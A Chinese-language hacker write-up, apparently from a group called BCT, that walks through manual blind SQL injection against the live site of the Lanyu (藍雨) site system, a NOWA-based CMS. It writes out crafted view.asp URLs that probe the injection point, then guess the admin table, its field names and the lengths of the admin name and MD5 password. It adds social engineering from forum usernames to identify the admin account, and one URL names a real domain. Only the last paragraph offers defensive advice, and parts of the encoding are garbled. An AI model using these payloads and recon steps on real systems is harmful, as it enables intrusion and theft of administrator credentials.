本來(lái)是投稿文章來(lái)的,因?yàn)楦寮膯?wèn)題所以就上不了雜志,再加上最近有些人在網(wǎng)站留言說(shuō)三道四的猜測(cè)藍(lán)雨的問(wèn)題,所以我就公開(kāi)漏洞預(yù)警所說(shuō)的漏洞,官方已經(jīng)把版本都打了補(bǔ)丁,當(dāng)然有些使用網(wǎng)站至今還是存在著SQL注入漏洞的,所以一切后果與我以及BCT小組無(wú)關(guān) 
最近無(wú)聊，在網(wǎng)上走來(lái)走去看看。發(fā)現(xiàn)現(xiàn)在的整站系統(tǒng)可是越來(lái)越多了，修改版本等等的N多阿！而藍(lán)雨設(shè)計(jì)整站的使用者也越來(lái)越多了，藍(lán)雨整站系統(tǒng)是從NOWA 0.94修改而來(lái)的！基于NOWA的系統(tǒng)不單指藍(lán)雨一個(gè)還有很多的！我在此就不一一列舉了，核心都是一樣，只是程序的附加功能就各自不同！安全方面因?yàn)榛贜OWA的系統(tǒng)所以到目前知道的漏洞就只有上傳而已。以下文章中就會(huì)出現(xiàn)NOWA修改系統(tǒng)漏洞當(dāng)中從未有的SQL注入漏洞！只怪藍(lán)雨修改程序的時(shí)候沒(méi)有做好注入問(wèn)題了！這個(gè)可不能怪我！誰(shuí)叫人家程序設(shè)計(jì)員不會(huì)注意安全死角阿？ 
一，確定注入點(diǎn) 
我們就拿官方網(wǎng)站進(jìn)行測(cè)試，因?yàn)閾?dān)心外面提供的版本并非最新版本導(dǎo)致文章的正確性有差異。首先我們提交http://***.net/view.asp?action=art&art_id=70 and 1=1 返回以下信息。 
再次輸入 
http://***.net/view.asp?action=art&art_id=70%20and%201=2 返回以下信息 
從標(biāo)準(zhǔn)的SQL注入點(diǎn)檢測(cè)and1=1和and 1=2d 信息返回可以看出，兩個(gè)圖片的分別這個(gè)程序的評(píng)論存在著SQL注入，因?yàn)楝F(xiàn)在基于NOWA的修改版本都是基于ACCESS數(shù)據(jù)庫(kù)架構(gòu)的，所以我們可以進(jìn)一步的確定這個(gè)程序的數(shù)據(jù)庫(kù)類型。 
二，猜解數(shù)據(jù)庫(kù)表 
因?yàn)楸救藨卸杷灾缓媒栌肗BSI進(jìn)行SQL注入的工作了，怎么知道是不是因?yàn)榈腘BSI實(shí)在太厲害了，不能夠殺雞用牛刀。竟然它全部檢測(cè)不出我所找到的SQL注入點(diǎn)存在著SQL注入!實(shí)在太令人感到吃驚（HaK_BaN：難道真的....真的要我手動(dòng)注入T_T）NBSI太給面子了！所以我只好硬著頭皮去進(jìn)行手動(dòng)注入了。首先猜解數(shù)據(jù)庫(kù)的表是否存在admin表。構(gòu)造語(yǔ)句提交 
http://***.net/view.asp?action=art&art_id=70%20and%200????(select%20count(*)%20from%20admin) 現(xiàn)在的程序當(dāng)中的數(shù)據(jù)庫(kù)管理員表，不就是admin，adminuser user之類的名稱，所以我們只要抓住程序作者的心理就可以知道了，提交語(yǔ)句之后頁(yè)面返回正常，我們就可以確定數(shù)據(jù)庫(kù)當(dāng)中是存在admin這個(gè)表的。我們只是需要admin的密碼以及賬號(hào)，所以數(shù)據(jù)庫(kù)當(dāng)中其他的表可以忽略。 
三，猜解數(shù)據(jù)庫(kù)字段 
在猜解之前為了減少更多的麻煩和無(wú)謂的猜解，應(yīng)該要對(duì)于所入侵的網(wǎng)站進(jìn)行一些資料的搜集，例如管理員的QQ以及管理員所使用的網(wǎng)名都是要知道的，因?yàn)槲覀兺ǔ６紩?huì)使用容易記憶的密碼以及賬號(hào)，從而使自己可以不會(huì)忘記。找了文章頁(yè)面等等的功能頁(yè)面都找不到文章編輯以及管理員的QQ號(hào)碼。只好在BBS當(dāng)中尋找了，很幸運(yùn)的是我們?cè)贐BS當(dāng)中找到了“藍(lán)雨”這個(gè)用戶名，這樣子等待會(huì)猜解admin賬號(hào)的時(shí)候我們可以試試中文的名字或者是拼音字母。（HaK_BaN：我可是曾經(jīng)在MSN以一個(gè)名字看穿PLMM性格以及生日的哦，大家要注意社會(huì)工程學(xué)的重要性阿） 
廢話少說(shuō)，我們看看這個(gè)程序的管理員字段是什么！？首先猜解是name的提交語(yǔ)句如下http://***.net/view.asp?action=art&art_id=70%20and%201=(select%20count(*)%20from%20admin%20where%20len(name)??0) (HaK_BaN:*_*不是阿！不是NAME字段阿）提交語(yǔ)句后信息返回頁(yè)面顯示不正常就證實(shí)admin表中沒(méi)有name這個(gè)字段名。看來(lái)又要想想如何去進(jìn)行猜解了，既然name字段不行就試試admin_name字段行不行！再次構(gòu)造猜解字段語(yǔ)句：http://***.net/view.asp?action=art&art_id=70%20and%201=(select%20count(*)%20from%20admin%20where%20len(admin_name)??0) （HaK_BaN：這下子總可以了吧？我又邁進(jìn)一步了！）提交語(yǔ)句之后頁(yè)面返回正常了，這下子終于可以了。 
然后，我們就開(kāi)始猜解password的字段了，其實(shí)一看上面的回顯我們就可以非?？隙ǖ恼f(shuō)password字段就是admin_password，所以提交的語(yǔ)句就是http://***.net/view.asp?action=art&art_id=70%20and%201=(select%20count(*)%20from%20admin%20where%20len(admin_password)??0) 信息回顯正常對(duì)吧?。抗?nbsp;
說(shuō)到這里整個(gè)猜解就差不多完場(chǎng)了?。ú锁B(niǎo)：什么什么阿？還有賬號(hào)和密碼了？你丫的是不是傻了？）猜解密碼和賬號(hào)就更加是一個(gè)麻煩和浪費(fèi)時(shí)間的活來(lái)的！好好，我們?nèi)タ纯促~號(hào)和密碼的猜解如何？首先我們猜解賬號(hào)的長(zhǎng)短阿！假設(shè)，我們之前就已經(jīng)拿到了管理員常用的賬號(hào)名稱“藍(lán)雨”是管理員賬號(hào)。我們就有兩種可能性，一是藍(lán)雨的拼音“l(fā)anyu”，二是藍(lán)雨的中文轉(zhuǎn)為ASCII碼進(jìn)行猜解。我們首先試試拼音這個(gè)的可能性，如果是這樣子的話我們就要構(gòu)造admin_name的長(zhǎng)度為5，所以提交語(yǔ)句為http://***.net/view.asp?action=art&art_id=70%20and%201=(select%20count(*)%20from%20admin%20where%20len(admin_name)??5) 頁(yè)面信息返回?zé)o法正常顯示。然后再提交http://fj126.net/view.asp?action=art&art_id=70%20and%201=(select%20count(*)%20from%20admin%20where%20len(admin_name)??4)這下子頁(yè)面可算是正常了！然后再次提交語(yǔ)句為http://***.net/view.asp?action=art&art_id=70%20and%201=(select%20count(*)%20from%20admin%20where%20len(admin_name)=5)我們就可以確定admin_name的長(zhǎng)度為5了。賬號(hào)長(zhǎng)度出來(lái)了，而password的長(zhǎng)度我們還不知道，根據(jù)信息收集得知密碼是利用MD5 16位加密的，所以我們可以猜解為密碼長(zhǎng)度是16位喔！提交語(yǔ)句http://***.net/view.asp?action=art&art_id=70%20and%201=(select%20count(*)%20from%20admin%20where%20len(admin_password)=16)這里就不截圖了！我們可以基本上就知道了！賬號(hào)長(zhǎng)度為5位，密碼長(zhǎng)度為16位。（HaK_BaN：說(shuō)真的我很久沒(méi)有手動(dòng)了，都差不多腰酸背痛了?。┲劣谫~號(hào)是多少密碼是多少我就不再列舉了！經(jīng)過(guò)測(cè)試剛剛的社會(huì)工程學(xué)得到的管理員賬號(hào)為：lanyu是正確的！而密碼的確是MD516位加密。整個(gè)過(guò)程可以利用臭要飯的CSC進(jìn)行注入測(cè)試！ 
四，總結(jié) 
整個(gè)程序的SQL注入頁(yè)面有幾個(gè)，都是基于藍(lán)雨整站自身添加的功能頁(yè)面沒(méi)有做好相關(guān)的SQL注入導(dǎo)致的，如果大家有在使用這個(gè)程序的話，可以使用通用防止注入的腳本進(jìn)行防止，雖然說(shuō)MD5需要暴力破解，但是如果你真的得罪人的話，不要說(shuō)破解了?？赡苣愕木W(wǎng)站都會(huì)被別人干的一干二凈，網(wǎng)絡(luò)安全是很重要的一部分，希望大家不要輕視安全這個(gè)環(huán)節(jié)！以上文章如有錯(cuò)誤請(qǐng)大家指出，有什么問(wèn)題可以到非安全的論壇或者BCT小組找我！ 

最新評(píng)論